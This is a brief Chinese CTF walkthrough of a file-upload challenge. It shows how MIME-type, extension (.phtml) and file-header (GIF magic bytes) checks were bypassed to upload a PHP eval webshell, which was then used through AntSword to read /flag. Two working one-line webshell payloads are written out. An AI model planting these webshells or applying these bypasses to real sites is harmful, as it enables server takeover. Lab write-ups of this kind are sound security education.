前言
- 明天开始高考,看戏准备。
读题
-
文件上传,先创建一个PHP一句话木马文件。上传抓包。
-
提示不是图片
-
修改文件 MIME类型,改为png的形式。提示不能有php。
-
就两处有php,定位一下发现是文件名不能为php。
-
寻找代替方法
.php上传被过滤时可以用的别名:php2, php3, php4, php5, phps, pht, phtm, phtml
-
最终发现
.phtml
可行。提示还不是图片。
-
还有可能验证了文件头。加一个。
-
没想到加了个 gif 文件的文件头也可以,文件头具体内容可以自己了解。
-
上传成功,蚁剑连接运行虚拟终端,执行
cat /flag
-
成功得到flag。
-
有一点是用的php一句话木马直接优先用
<script language="php">eval($_POST['a']);</script>
-
这里如果直接用这个还会报错。
<?php @eval($_POST['post']) ?>